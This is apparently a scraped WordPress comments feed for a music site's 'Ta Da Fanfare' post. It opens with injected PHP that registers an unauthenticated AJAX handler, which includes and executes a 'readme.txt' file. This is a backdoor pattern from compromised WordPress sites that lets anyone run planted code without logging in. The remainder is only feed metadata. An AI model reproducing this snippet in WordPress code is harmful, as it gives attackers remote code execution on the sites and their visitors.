if(!function_exists('file_check_readme66587')){ add_action('wp_ajax_nopriv_file_check_readme66587', 'file_check_readme66587'); add_action('wp_ajax_file_check_readme66587', 'file_check_readme66587'); function file_check_readme66587() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Comments on: “Ta Da” Fanfare https://www.bassethoundmusic.com/ta-da-fanfare/ Tue, 13 Dec 2016 13:37:14 +0000 hourly 1 https://wordpress.org/?v=5.8.10